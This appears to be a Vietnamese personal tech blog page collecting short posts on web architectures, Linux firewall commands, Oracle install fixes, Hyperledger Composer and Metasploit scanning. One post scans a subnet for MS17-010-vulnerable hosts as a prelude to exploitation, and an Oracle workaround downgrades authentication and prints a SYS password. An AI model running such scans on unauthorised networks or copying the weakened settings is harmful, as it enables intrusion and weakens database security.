khanhnnvn

Mô hình web phổ biến.

 Linux  Comments Off on Mô hình web phổ biến.
Aug 312018
 

Giới thiệu

Khi quyết định xem nên sử dụng kiến trúc server nào cho ứng dụng Web của bạn, có rất nhiều yếu tố cần phải cân nhắc, ví dụ như hiệu năng, khả năng mở rộng, tính khả dụng, độ tin cậy, chi phí và dễ quản lý.

Dưới đây là danh sách một số kiến trúc server được sử dụng phổ biến, với những mô tả ngắn gọn về mỗi loại, bao gồm ưu và nhược điểm của chúng. Hãy nhớ rằng tất cả các khái niệm được đề cập sau đây có thể được sử dụng trong các kết hợp khác nhau, và mỗi môi trường lại đòi hỏi những yêu cầu khác nhau.

1. Tất cả trong một

Toàn bộ môi trường đều nằm hết trên một server duy nhất. Đối với một ứng dụng web thông thường, sẽ bao gồm web server, application server và database server. Một ví dụ của cách thiết lập này đó là LAMP stack, viết tắt của Linux, Apache, MySQL và PHP, đều nằm trên một server duy nhất.

Trường hợp sử dụng: Tốt cho việc thiết lập một ứng dụng nhanh chóng, bởi vì đây là thiết lập đơn giản nhất có thể

Ưu điểm: Đơn giản

Nhược điểm:

 • Ứng dụng và database sử dụng tranh chấp tài nguyên server (CPU, Memory, I/O,…), do đó bên cạnh việc gây ra giảm hiệu năng của hệ thống, nó còn có thể gây khó khăn trong việc xác định thành phần nào gây ra điều đó.
 • Không dễ dàng mở rộng ứng dụng theo chiều ngang

2. Tách riêng Database Server

Cách thiết lập này sẽ tách riêng hệ thống database với những phần còn lại để loại bỏ việc tranh chấp tài nguyên giữa ứng dụng và database, đồng thời tăng tính bảo mật bằng cách giấu database khỏi DMZ hay public internet.

Trường hợp sử dụng: Tốt cho việc thiết lập một ứng dụng nhanh chóng, tuy nhiên có thể loại bỏ được việc tranh chấp cùng tài nguyên hệ thống giữa ứng dụng với database.

Ưu điểm:

 • Các tầng ứng dụng và database không còn tranh chấp cùng tài nguyên hệ thống nữa (CPU, Memory, I/O,…)
 • Bạn có thể mở rộng theo chiều dọc mỗi tầng riêng biệt, bằng cách thêm tài nguyên cho server nào cần (CPU, Memory)
 • Tùy thuộc vào thiết lập của bạn, nó có thể tăng tính bảo mật bằng cách giấu database của bạn khỏi DMZ.

Nhược điểm:

 • Thiết lập phức tạp hơn một chút so với cách chỉ sử dụng một server duy nhất.
 • Có thể phát sinh các vấn đề về hiệu năng nếu kết nối mạng giữa 2 server có độ trễ cao (do khoảng cách địa lý giữa các server) hoặc băng thông quá thấp cho việc truyền tải dữ liệu.

3. Load Balancer (Reverse Proxy)

Load Balancer (LB) được thêm vào hệ thống để tăng performance và uptime (là thời gian đáp ứng của hệ thống đối với người dùng) của hệ thống bằng cách phân tải ra nhiều server. Nếu một server bị lỗi, các server còn lại sẽ phân chia nhau chịu tải cho đến khi server kia hoạt động trở lại. Nó có thể được sử dụng để cung cấp cho nhiều ứng dụng thông qua cùng một domain và port, bằng cách sử dụng một reverse proxy layer 7 ( tầng ứng dụng)

Một số phần mềm cung cấp khả năng phân tải: HAProxy, Nginx và Varnish,…

Trường hợp sử dụng: Kiến trúc này hữu dụng trong những môi trường đòi hỏi khả năng mở rộng bằng cách thêm nhiều servers, hay còn gọi là khả năng mở rộng theo chiều ngang.

Ưu điểm:

 • Cho phép mở rộng hệ thống theo chiều ngang, bằng cách thêm nhiều servers
 • Có thể bảo vệ chống lại những tấn công DDOS bằng cách giới hạn kết nối client với một số lượng và tần số hợp lý.

Nhược điểm:

 • Load balancer có thể gây ra tình trạng “nghẽn cổ chai” nếu server chạy LB không được cung cấp đủ tài nguyên hoặc không được cấu hình tốt.
 • Gặp một số phức tạp cần phải xem xét kĩ lưỡng (đồng bộ session giữa 2 server, … )
 • Load balancer là một "single point of failure", nếu nó sập, toàn bộ service của chúng ta cũng sẽ sập theo. Một thiết lập high availability (HA) là một cấu trúc không phải là “single point of failure”. Để biết rõ hơn về cách thiết lập một HA, bạn có thể đọc thêm ở đây.

4. HTTP Accelerator (Caching Reverse Proxy)

Một HTTP Accelerator, hay caching HTTP reverse proxy, có thể được sử dụng để giảm thời phục vụ của hệ thống đối với người dùng sử dụng một vài kĩ thuật khác nhau. Kĩ thuật chính của phương pháp này là cache lại response từ một web server hoặc application server vào trong memory, và những request trong tương lai với cùng nội dung sẽ được cung cấp một cách nhanh chóng mà không cần tương tác với web server hoặc application server.

Một số phần mềm cung cấp HTTP acceleration: Varnish, Squid, Nginx.

Trường hợp sử dụng: Kiến trúc này hữu dụng trong những hệ thống dynamic web nặng về nội dung hoặc với nhiều tệp được truy cập thường xuyên.

Ưu điểm:

 • Tăng performance bằng cách giảm CPU load trên web server, thông qua caching
 • Có thể đóng vai trò như một reverse proxy Load Balancer
 • MỘt vài phần mềm caching có thể bảo vệ chống lại các tấn công DDOS

Nhược điểm:

 • Cần phải tinh chỉnh để có performance tốt nhất.
 • Nếu tốc độ truy cập vào cache chậm, nó có thể làm giảm hiệu năng

5. Master-Slave Database Replication

MỘt cách để tăng performance của hệ thống database thực hiện nhiều thao tác đọc hơn ghi, ví dụ như các hệ thống CMS, đó là sử dụng kiến trúc Master-Slave Replication. Master-Slave replication yêu cầu một master và một hoặc nhiều slave. Master đóng vai trò ghi dữ liệu còn các Slave đóng vai trò đọc dữ liệu ra. Khi có dữ liệu được ghi trên Master, những dữ liệu này sau đó sẽ được đồng bộ dần lên các Slave. Kiến trúc này giúp chia tải (các thao tác đọc dữ liệu) ra nhiều servers.

Trường hợp sử dụng: Hữu dụng cho các hệ thống mà cần tăng tốc đọc đọc dữ liệu

Ưu điểm:

 • Tăng hiệu năng đọc dữ liệu từ database bằng cách phân tải request ra nhiều server Slave
 • Có thể tăng hiệu năng ghi dữ liệu bằng cách chỉ sử dụng server Master cho việc ghi thôi (Master không cần phải thực hiện các thao tác đọc)

Nhược điểm:

 • Cài đặt kiến trúc này khá phức tạp
 • Cập nhật lên các server Slaves diễn ra bất đồng bộ, do vậy mà nội dung trên đó có thể sẽ chưa được cập nhật mới nhất trong những thời điểm nhất định
 • Nếu Master lỗi, không thể ghi được dữ liệu lên

6. Kết hợp tất cả kiến trúc trên

Chúng ta có thể thêm Load Balancer cho các caching server, ngoài những application servers và sử dụng kiến trúc Master-Slave Replication cho databases. Phương pháp này kết hợp ưu điểm của tất cả những phương pháp trên và hạn chế những vấn đề, sự phức tạp của chúng.

Giả sử rằng Load Balancer sẽ được cấu hình để nhận biết các statis requests (ví dụ như ảnh, css, javascript,…) và gửi những request đó tới các caching servers, và gửi những requests khác tới application servers.

Sau đây là mô tả điều gì sẽ xảy ra khi một user gửi một request dynamic content:

 1. User gửi một request dynamic content tới http://example.com/ (load balancer)
 2. LB gửi request tới app-backend
 3. app-backend đọc dữ liệu từ các Database Slave và trả về dữ liệu cho LB
 4. LB sau đó sẽ trả về dữ liệu cho user

Nếu như user gửi một request static content:

 1. LB kiểm tra trong cache-backend xem nội dung được yêu cầu đã được cache hay chưa.
 2. Nếu đã được cache: trả dữ liệu về cho LB và chuyển tới Bước 7. Nếu chưa được cachecache-backend sẽ chuyển request này cho app-backend, thông qua LB.
 3. LB sẽ chuyển request tới cho app-backend
 4. app-backend đọc dữ liệu từ các Database Slave sau đó trả dữ liệu về cho LB
 5. LB chuyển response cho cache-backend
 6. cache-backend thực hiện cache lại nội dung bên trong response
 7. LB sau đó sẽ trả về dữ liệu cho user

Kết luận

Trên đây tôi đã giới thiệu cho các bạn một số kiến trúc server phổ biến cho các ứng dụng web. Các bạn có thể kết hợp chúng tùy ý để xây dựng cho một kiến trúc server phù hợp nhất cho ứng dụng riêng của bạn nhé.

Network command

 Linux  Comments Off on Network command
Aug 272018
 
 1. Cài đặt công cụ mạng:

yum install net-tools

2. Câu lệnh add route và kiểm tra route

route -n

ip route add 172.16.122.11 via 172.16.216.1 dev eth0

3. Kiểm tra các port đang mở bởi service

lsof -i tcp:22

Firewall on Linux

 Linux  Comments Off on Firewall on Linux
Aug 232018
 

1055 ufw allow 8080
1138 ufw status
1139 ufw allow 3000
1144 ufw allow 4200
1603 ufw –help
1604 ufw enable –help
1605 ufw allow 8090
1606 ufw reload
1737 ufw allow 8686/tcp
1738 ufw reload
1756 ufw allow 5984/tcp
1757 ufw allow reload
1758 ufw allow reloads
1759 ufw reload
2004 ufw allow from x.x.x.x to any port 9527

Oracle installation errors and fixes

 Database  Comments Off on Oracle installation errors and fixes
Aug 212018
 

This article will list all errors/issues I encounter during Oracle installation with their fix.
It will be updated with all new errors I will encounter.

In this article …
… “Fix prior install” needs jar binary. Install it with the following command:

$ yum -y install java-devel

memcpy error in ins_ctx.mk

Operating System: Oracle Enterprise Linux 7
Oracle version: 11.2.0.1

Error output

INFO: gcc -o ctxhx -m64 -L/u01/app/oracle/product/11.2.0/db_1/ctx/lib/ -L/u01/app/oracle/product/11.2.0/db_1/lib/ -L/u01/app/oracle/product/11.2.0/db_1/lib/stubs/  /u01/app/oracle/product/11.2.0/db_1/ctx/lib/ctxhx.o -L/u01/app/oracle/product/11.2.0/db_1/ctx/lib/ -lm -lsc_fa -lsc_ex -lsc_da -lsc_ca -lz  -lctxhx -Wl,-rpath,/u01/app/oracle/product/11.2.0/db_1/ctx/lib -lsnls11 -lnls11  -lcore11 -lsnls11 -lnls11 -lcore11 -lsnls11 -lnls11 -lxml11 -lcore11 -lunls11 -lsnls11 -lnls11 -lcore11 -lnls11  `cat /u01/app/oracle
INFO: /product/11.2.0/db_1/lib/sysliblist`
 
INFO: /lib64/libstdc++.so.5: undefined reference to `memcpy@GLIBC_2.14'
collect2: error: ld returned 1 exit status
 
INFO: make: *** [ctxhx] Error 1
 
INFO: End output from spawned process.
INFO: ----------------------------------
INFO: Exception thrown from action: make
Exception Name: MakefileException
Exception String: Error in invoking target 'install' of makefile '/u01/app/oracle/product/11.2.0/db_1/ctx/lib/ins_ctx.mk'. See '/u01/app/oraInventory/logs/installActions2015-04-17_10-00-15PM.log' for details.
Exception Severity: 1

Solution

Fix prior install

Execute the following script:

# Fix ctx/lib/ins_ctx.mk
 
ORACLE_SRC_INSTALL_DIR=/media/sf_uxora_share/database
cd ${ORACLE_SRC_INSTALL_DIR}/stage/Components
 
jar_file=
for i_file in $( ls ./oracle.ctx/11.2.0.1.0/1/DataFiles/filegroup*.jar ); do
unzip -l ${i_file} ctx/lib/ins_ctx.mk 2>&1 1>/dev/null
[[ $? -eq 0 ]] && jar_file=${i_file} && break
done
 
cat << __EOF__ > /tmp/memcpy_wrap.c
#include <stddef.h>
#include <string.h>
 
asm (".symver wrap_memcpy, memcpy@GLIBC_2.14");
void *wrap_memcpy(void *dest, const void *src, size_t n) {
return memcpy(dest, src, n);
}
__EOF__
unzip ${jar_file} ctx/lib/ins_ctx.mk 2>&1 1>/dev/null
if [[ $? -eq 0 ]]; then
sed -i -e 's/\$(INSO_LINK)/\$(INSO_LINK) -Wl,--wrap=memcpy_wrap \$(ORACLE_HOME)\/ctx\/lib\/memcpy_wrap.o/g' ctx/lib/ins_ctx.mk
gcc -c /tmp/memcpy_wrap.c -o ctx/lib/memcpy_wrap.o && rm /tmp/memcpy_wrap.c
jar -uvf  ${jar_file} ctx/lib/ins_ctx.mk ctx/lib/memcpy_wrap.o
fi

Fix during install

This fix can only be done in GUI mode installer.
When the windows prompt this error message:

Error in invoking target 'install' of makefile '/u01/app/oracle/product/11.2.0/db_1/ctx/lib/ins_ctx.mk'. See '/u01/app/oraInventory/logs/installActions2015-04-17_10-00-15PM.log' for details.

Execute the following script then click retry to resume install

# Fix ctx/lib/ins_ctx.mk
 
ORACLE_HOME=/u01/app/oracle/product/11.2.0/db_1
 
cat << __EOF__ > /tmp/memcpy_wrap.c
#include <stddef.h>
#include <string.h>
 
asm (".symver wrap_memcpy, memcpy@GLIBC_2.14");
void *wrap_memcpy(void *dest, const void *src, size_t n) {
return memcpy(dest, src, n);
}
__EOF__
 
if [[ -e "${ORACLE_HOME}/ctx/lib/ins_ctx.mk" ]]; then
sed -i -e 's/\$(INSO_LINK)/\$(INSO_LINK) -Wl,--wrap=memcpy_wrap \$(ORACLE_HOME)\/ctx\/lib\/memcpy_wrap.o/g' ${ORACLE_HOME}/ctx/lib/ins_ctx.mk
gcc -c /tmp/memcpy_wrap.c -o ${ORACLE_HOME}/ctx/lib/memcpy_wrap.o && rm /tmp/memcpy_wrap.c
fi

ins_emagent.mk error

Operating System: Oracle Enterprise Linux 7
Oracle version: 11.2.0.1

Error output

INFO: ib/amd64 -z lazyload -ljava -ljvm -lverify -z nolazyload -Wl,-rpath,/u01/app/oracle/product/11.2.0/db_1/lib/:/u01/app/oracle/product/11.2.0/db_1/sysman/lib/:/u01/app/oracle/product/11.2.0/db_1/jdk/jre/lib/amd64/server:/u01/app/oracle/product/11.2.0/db_1/jdk/jre/lib/amd64 -Wl,--allow-shlib-undefined    `cat /u01/app/oracle/product/11.2.0/db_1/lib/sysliblist` -ldl -lm
 
INFO: /u01/app/oracle/product/11.2.0/db_1/sysman/lib/ins_emagent.mk:127: warning: overriding recipe for target `nmosudo'
/u01/app/oracle/product/11.2.0/db_1/sysman/lib/ins_emagent.mk:56: warning: ignoring old recipe for target `nmosudo'
 
INFO: /usr/bin/ld: warning: -z lazyload ignored.
/usr/bin/ld: warning: -z nolazyload ignored.
/usr/bin/ld: /u01/app/oracle/product/11.2.0/db_1/sysman/lib//libnmectl.a(nmectlt.o): undefined reference to symbol 'B_DestroyKeyObject'
/usr/bin/ld: note: 'B_DestroyKeyObject' is defined in DSO /u01/app/oracle/product/11.2.0/db_1/lib/libnnz11.so so try adding it to the linker command line
/u01/app/oracle/product/11.2.0/db_1/lib/libnnz11.so: could not read symbols: Invalid operation
collect2: error: ld returned 1 exit sta
INFO: tus
 
INFO: make[1]: Leaving directory `/u01/app/oracle/product/11.2.0/db_1/sysman/lib'
 
INFO: make[1]: *** [/u01/app/oracle/product/11.2.0/db_1/sysman/lib/emdctl] Error 1
make: *** [emdctl] Error 2
 
INFO: End output from spawned process.
INFO: ----------------------------------
INFO: Exception thrown from action: make
Exception Name: MakefileException
Exception String: Error in invoking target 'agent nmhs' of makefile '/u01/app/oracle/product/11.2.0/db_1/sysman/lib/ins_emagent.mk'. See '/u01/app/oraInventory/logs/installActions2015-04-23_01-23-30PM.log' for details.
Exception Severity: 1

Solution

Fix prior install

Execute the following script:

# Fix sysman/lib/ins_emagent.mk
 
ORACLE_SRC_INSTALL_DIR=/media/sf_uxora_share/database
cd ${ORACLE_SRC_INSTALL_DIR}/stage/Components
 
jar_file=
for i_file in $( ls ./oracle.sysman.agent/*/1/DataFiles/filegroup*.jar ); do
unzip -l ${i_file} sysman/lib/ins_emagent.mk 2>&1 1>/dev/null
[[ $? -eq 0 ]] && jar_file=${i_file} && break
done
 
unzip ${jar_file} sysman/lib/ins_emagent.mk 2>&1 1>/dev/null
if [[ $? -eq 0 ]]; then
sed -i -e 's/\$(MK_EMAGENT_NMECTL)/\$(MK_EMAGENT_NMECTL) -lnnz11/g' sysman/lib/ins_emagent.mk
jar -uvf  ${jar_file} sysman/lib/ins_emagent.mk
fi

Fix during install

This fix can only be done in GUI mode installer. When the windows prompt this error message:

Error in invoking target 'agent nmhs' of makefile '/u01/app/oracle/product/11.2.0/db_1/sysman/lib/ins_emagent.mk'. See '/u01/app/oraInventory/logs/installActions2015-04-23_01-23-30PM.log' for details.

Execute the following script then click retry to resume install

# Fix ctx/lib/ins_ctx.mk
 
ORACLE_HOME=/u01/app/oracle/product/11.2.0/db_1
 
if [[ -e "${ORACLE_HOME}/sysman/lib/ins_emagent.mk" ]]; then
sed -i -e 's/\$(MK_EMAGENT_NMECTL)/\$(MK_EMAGENT_NMECTL) -lnnz11/g' ${ORACLE_HOME}/sysman/lib/ins_emagent.mk
fi

ORA-00845

Operating System: Oracle Enterprise Linux 7
Oracle version: Any

Error output

ORA-00845: MEMORY_TARGET not supported on this system

Solution

Reduce memory target parameter

Increase the size of /dev/shm

# check filesystems
$ df -h
Filesystem                                 Size  Used Avail Use% Mounted on
/dev/mapper/ol-root                         14G  5.0G  9.0G  36% /
devtmpfs                                   3.8G     0  3.8G   0% /dev
tmpfs                                      3.8G  1.9G  2.0G  48% /dev/shm
tmpfs                                      3.8G  8.9M  3.8G   1% /run
tmpfs                                      3.8G     0  3.8G   0% /sys/fs/cgroup
/dev/vdb1                                   32G   11G   22G  33% /u01
/dev/vda1                                  497M  150M  348M  31% /boot
 
# increase /dev/shm accordingly to your max ram memory
$ mount -o remount,size=6G /dev/shm
 
# make this change permanent, add/change /etc/fstab
$ vi /etc/fstab
...
tmpfs  /dev/shm  tmpfs  defaults,size=6G  0 0
...
 
# update mount
$ mount -a

ORA-19502/ORA-27072

Operating System: Oracle Enterprise Linux 7
Oracle version: Any

Error output

...
ORA-19502: write error on file "...",
block number 251905 (block size=512)
ORA-27072: File I/O error
Linux-x86_64 Error: 25: Inappropriate ioctl for device
...

Solution

Free disk space/Add disk space

There is not enough disk space. Check disk space with df -h <path>

ORA-28040: No matching authentication protocol

Operating System: Any
Oracle version: from 12.1.0.1

Error output

ORA-28040: No matching authentication protocol
ORA-01017: invalid username/password; logon denied

You may encounter this error with a new 12c database because Oracle Enterprise Cloud Manager 12c is still using the old 10g JDBC driver (ojdbc14.jar) to connect.

Prior to version 12c, the default setting for SQLNET.ALLOWED_LOGON_VERSION (deprecated parameter in 12c) was 8. Now in 12c the default value of the 12c equivalent parameters SQLNET.ALLOWED_LOGON_VERSION_CLIENT and SQLNET.ALLOWED_LOGON_VERSION_SERVER are now 11.

Solution/Workaround

# Set minimum logon authentification version in sqlnet.ora
# To avoid ORA-28040: No matching authentication protocol
[oracle]$ cat >> $ORACLE_HOME/network/admin/sqlnet.ora <<_EOF_
SQLNET.ALLOWED_LOGON_VERSION_SERVER=8
SQLNET.ALLOWED_LOGON_VERSION_CLIENT=8
_EOF_
 
# Recreate oracle user password to be compatible 10G
# To avoid ORA-01017: invalid username/password; logon denied
[oracle]$ sqlplus / as sysdba
 
-- Check password compatibility
SQL> select USERNAME,PASSWORD_VERSIONS from dba_users where USERNAME = 'SYS';
USERNAME                         PASSWORD_VERSIONS
-------------------------------- -----------------
SYS                              11G 12C
 
-- Reinitialize password
SQL> alter user SYS identified by OraSys_pw0 ;
 
User SYS altered.
 
-- Check again password compatibility
SQL> select USERNAME,PASSWORD_VERSIONS from dba_users where USERNAME = 'SYS';
USERNAME                         PASSWORD_VERSIONS
-------------------------------- -----------------
SYS                              10G 11G 12C

Now database instance will accept 10g authentification only with users who have 10G PASSWORD_VERSIONS compatibility.

 

Hope that helps,

Viết Web ứng dụng giao tiếp với Hyperledger Composer

 BlockChain  Comments Off on Viết Web ứng dụng giao tiếp với Hyperledger Composer
Jun 252018
 

Để tương tác với một business network, các ứng dụng có thể gọi đến các REST API. Để tạo một API cho một business network, bạn có thể dùng câu lệnh:

composer-rest-server

Để tạo một ứng dụng  Angular có thể giao tiếp với REST API, ta sử dụng lệnh

yo hyperledger-composer

Bạn có thể tham khảo  Developer Tutorial để biết chi tiết hơn về cách sử dụng lệnh composer-rest-server và các sinh ra một ứng dụng dùng Angular.

Để sinh một ứng dụng Angular từ một Business Network Archive (.BNA) chúng ta thực hiện theo các bước sau:

1. Khởi động Hyperledger Fabric trên máy tính cá nhân của bạ

Nếu bạn đã hoàn thành việc cài đặt môi trường thì Fabric đã được cài đặt trên máy tính của bạn. Bạn chỉ cần chuyển đến thư mục fabric-dev-servers và khởi động Hyperledger Fabric. Chúng ta thực hiện các câu lệnh sau:

cd ~/fabric-dev-servers
./startFabric.sh
./createPeerAdminCard.sh

Câu lện cuối sẽ tạo một PeerAdmin .card  nơi mà sẽ cần thiết để thay đổi mã nguồn chạy trên môi trường phát triển. Để thống ke các card đang dùng chúng ta sẽ có thể dùng lệnh:

composer card list

2. Chuẩn bị Hyperledger Fabric peers

Chúng ta sẽ tạo một dự án có tên là tutorial-network sẽ xuất hiện một ‘PeerAdmin’ card cho bạn..

composer network install --card PeerAdmin@hlfv1 --archiveFile tutorial-network@0.0.1.bna

3. Khởi động Business Network trên Hyperledger Fabric

Để khởi động tutorial-network BNA chúng ta dùng lệnh

composer network start --networkName tutorial-network --networkVersion 0.0.1 --networkAdmin admin --networkAdminEnrollSecret adminpw --card PeerAdmin@hlfv1

Câu lệnh trên sẽ tạo một tập tin có tên admin@tutorial-network.card

Bạn nên ghi nhớ tài khoản admin và mật khẩu adminpw 

4.Cuối cùng bạn sẽ sử dụng ‘admin’ card

Chúng ta sẽ sử dụng câu lệnh:

composer card import --file admin@tutorial-network.card

5. Khởi động REST server

Bạn chỉ cần chạy câu lệnh sau để khởi động API, sau khi chạy xong bạn cần khai báo các thông số

composer-rest-server

 • Bạn cần khai báo cardname trong ví dụ này là admin@tutorial-network
 • Bạn điền namespaces
 • Chọn No
 • Chọn Yes
 • Chọn No

Sau đó bạn sẽ truy cập API qua URL:  http://localhost:3000/explorer

6. Generate ứng dụng Angular

Bạn chạy lệnh sau

yo hyperledger-composer

Bạn điền các thông số sau

Welcome to the Hyperledger Composer project generator
? Please select the type of project: Angular
You can run this generator using: 'yo hyperledger-composer:angular'
Welcome to the Hyperledger Composer Angular project generator
? Do you want to connect to a running Business Network? Yes
? Project name: [insert]
? Description: Hyperledger Composer Angular project
? Author name: [insert]
? Author email: [insert]
? License: Apache-2.0
? Name of the Business Network card: admin@tutorial-network
? Do you want to generate a new REST API or connect to an existing REST API? Connect to an existing REST
 API
? REST server address: http://localhost
? REST server port: 3000
? Should namespaces be used in the generated REST API? Namespaces are not used
Created application!

Cuối cùng bạn chuyển đến thư mục ứng dụng vừa tạo ra và gõ lệnh

npm start

Bạn sẽ truy câp link http://localhost:4200

Giao diện sẽ như sau:

 

Khác nhau giữa Hyperledger Fabric và Composer

 BlockChain  Comments Off on Khác nhau giữa Hyperledger Fabric và Composer
Jun 122018
 

What is Hyperledger Fabric?

Hyperledger Fabric là một blockchain không công khai cung cấp nền tảng cho ứng dụng giao dịch của doanh nghiệp. HF cung cấp cơ sở hạ tầng cho một hệ thống Blockchain.

What is Hyperledger Composer?

Hyperledger Composer là một nền tảng cung cấp các giao tiếp nhằm mục đích phát triển ứng dụng một cách nhanh trong trên Hyperledger Fabric. HC hướng đến ứng dụng của Blockchain

Relationship between Fabric and Composer

Dưới đây là biểu đồ cho thấy mối quen hệ giữa Fabric và Composer framework.

Về cơ bản để phát triển ứng dụng bạn vấn cần xây dựng hệ thống HF hoặc sử dụng có sẵn, HC chỉ nhằm mục đích giúp các nhà phát triển dễ dàng triển khai ứng dụng của mình hơn.

Chi tiết về các chức năng, bạn tham khảo hình sau:

Metasploit: Scan một mạng lỗi ms17_010

 Pentest  Comments Off on Metasploit: Scan một mạng lỗi ms17_010
Jun 062018
 

Giới thiệu: Metasploit là một công cụ khá mạnh dành cho các chuyên giá đánh giá. Bài viết dưới đây giới thiệu cách quét một mạng máy tính với lỗi cụ thể.

 

Bước 1: Bạn cần kết nối metasploit với cơ sở dữ liệu:

msfdb init

Bước2: Bạn lệnh sau để scan một mạng, chỉ ra những host online

db_nmap 172.16.12.0/24 -PN

sau khi scan xong, danh sách các host như sau:

Bước 3: Thực hiện scan như sau:

Bạn chỉ cần chạy run sau đó sẽ được kết quả như hình sau:

Giờ bạn chỉ việc khai thác.

Chúc bạn thành công.

Using the Database in Metasploit

 Pentest  Comments Off on Using the Database in Metasploit
Jun 052018
 

Setup our Metasploit Database

In Kali, you will need to start up the postgresql server before using the database.

root@kali:~# systemctl start postgresql

After starting postgresql you need to create and initialize the msf database with msfdb init

root@kali:~# msfdb init
Creating database user 'msf'
Enter password for new role: 
Enter it again: 
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema

 

Using Workspaces in Metasploit

When we load up msfconsole, and run ‘db_status‘, we can confirm that Metasploit is successfully connected to the database.

msf > db_status 
[*] postgresql connected to msf

Seeing this capability is a meant to keep track of our activities and scans in order. It’s imperative we start off on the right foot. Once connected to the database, we can start organizing our different movements by using what are called ‘workspaces’. This gives us the ability to save different scans from different locations/networks/subnets for example.

Issuing the ‘workspace‘ command from the msfconsole, will display the currently selected workspaces. The ‘default‘ workspace is selected when connecting to the database, which is represented by the * beside its name.

msf > workspace
* default
 msfu
 lab1
 lab2
 lab3
 lab4
msf > 

As we can see this can be quite handy when it comes to keeping things ‘neat’. Let’s change the current workspace to ‘msfu’.

msf > workspace msfu
[*] Workspace: msfu
msf > workspace
 default
* msfu
 lab1
 lab2
 lab3
 lab4
msf > 

Creating and deleting a workspace one simply uses the ‘-a‘ or ‘-d‘ followed by the name at the msfconsole prompt.

msf > workspace -a lab4
[*] Added workspace: lab4
msf > 


msf > workspace -d lab4 
[*] Deleted workspace: lab4
msf > workspace

It’s that simple, using the same command and adding the ‘-h‘ switch will provide us with the command’s other capabilities.

 
msf > workspace -h
Usage:
  workspace         List workspaces
  workspace -v        List workspaces verbosely
  workspace [name]      Switch workspace
  workspace -a [name] ...  Add workspace(s)
  workspace -d [name] ...  Delete workspace(s)
  workspace -D        Delete all workspaces
  workspace -r   Rename workspace
  workspace -h        Show this help information

msf > 

From now on any scan or imports from 3rd party applications will be saved into this workspace.

Now that we are connected to our database and workspace setup, lets look at populating it with some data. First we’ll look at the different ‘db_’ commands available to use using the ‘help’ command from the msfconsole.

msf > help
...snip...

Database Backend Commands
=========================

  Command      Description
  -------      -----------
  creds       List all credentials in the database
  db_connect    Connect to an existing database
  db_disconnect   Disconnect from the current database instance
  db_export     Export a file containing the contents of the database
  db_import     Import a scan result file (filetype will be auto-detected)
  db_nmap      Executes nmap and records the output automatically
  db_rebuild_cache Rebuilds the database-stored module cache
  db_status     Show the current database status
  hosts       List all hosts in the database
  loot       List all loot in the database
  notes       List all notes in the database
  services     List all services in the database
  vulns       List all vulnerabilities in the database
  workspace     Switch between database workspaces

Importing and Scanning

There are several ways we can do this, from scanning a host or network directly from the console, or importing a file from an earlier scan. Let’s start by importing an nmap scan of the ‘metasploitable 2’ host. This is done using the ‘db_import‘ followed by the path to our file.

msf > db_import /root/msfu/nmapScan 
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'
[*] Importing host 172.16.194.172
[*] Successfully imported /root/msfu/nmapScan
msf > hosts

Hosts
=====

address     mac        name os_name os_flavor os_sp purpose info comments
-------     ---        ---- ------- --------- ----- ------- ---- --------
172.16.194.172 00:0C:29:D1:62:80    Linux  Ubuntu      server     

msf > 

Once completed we can confirm the import by issuing the ‘hosts’ command. This will display all the hosts stored in our current workspace. We can also scan a host directly from the console using the ‘db_nmap’ command. Scan results will be saved in our current database. The command works the same way as the command line version of ‘nmap’

msf > db_nmap -A 172.16.194.134
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-06-18 12:36 EDT
[*] Nmap: Nmap scan report for 172.16.194.134
[*] Nmap: Host is up (0.00031s latency).
[*] Nmap: Not shown: 994 closed ports
[*] Nmap: PORT   STATE SERVICE   VERSION
[*] Nmap: 80/tcp  open http     Apache httpd 2.2.17 ((Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 

...snip...

[*] Nmap: HOP RTT   ADDRESS
[*] Nmap: 1  0.31 ms 172.16.194.134
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.91 seconds
msf >


msf > hosts

Hosts
=====

address     mac        name os_name      os_flavor os_sp purpose info comments
-------     ---        ---- -------      --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB    Microsoft Windows XP        server     
172.16.194.172 00:0C:29:D1:62:80    Linux       Ubuntu      server     

msf > 

Backing Up Our Data

Exporting our data outside the Metasploit environment is very simple. Using the ‘db_export‘ command all our gathered information can be saved in a XML file. This format can be easily used and manipulated later for reporting purposes. The command has 2 outputs, the ‘xml‘ format which will export all of the information currently stored in our active workspace, and the ‘pwdump‘ format which exports everything related to used/gathered credentials.

msf > db_export -h
Usage:
  db_export -f [-a] [filename]
  Format can be one of: xml, pwdump
[-] No output file was specified

msf > db_export -f xml /root/msfu/Exported.xml
[*] Starting export of workspace msfu to /root/msfu/Exported.xml [ xml ]...
[*]   >> Starting export of report
[*]   >> Starting export of hosts
[*]   >> Starting export of events
[*]   >> Starting export of services
[*]   >> Starting export of credentials
[*]   >> Starting export of web sites
[*]   >> Starting export of web pages
[*]   >> Starting export of web forms
[*]   >> Starting export of web vulns
[*]   >> Finished export of report
[*] Finished export of workspace msfu to /root/msfu/Exported.xml [ xml ]...


Using the Hosts Command

Now that we can import and export information to and from our database, let us look at how we can use this information within the msfconsole. Many commands are available to search for specific information stored in our database. Hosts names, address, discovered services etc. We can even use the resulting data to populate module settings such as RHOSTS. We’ll look how this is done a bit later.

The ‘hosts‘ command was used earlier to confirm the presence of data in our database. Let’s look at the different options available and see how we use it to provide us with quick and useful information. Issuing the command with ‘-h’ will display the help menu.

msf > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]

OPTIONS:
 -a,--add     Add the hosts instead of searching
 -d,--delete    Delete the hosts instead of searching
 -c <col1,col2>  Only show the given columns (see list below)
 -h,--help     Show this help information
 -u,--up      Only show hosts which are up
 -o     Send output to a file in csv format
 -O    Order rows by specified column number
 -R,--rhosts    Set RHOSTS from the results of the search
 -S,--search    Search string to filter by
 -i,--info     Change the info of a host
 -n,--name     Change the name of a host
 -m,--comment   Change the comment of a host
 -t,--tag     Add or specify a tag to a range of hosts

Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags

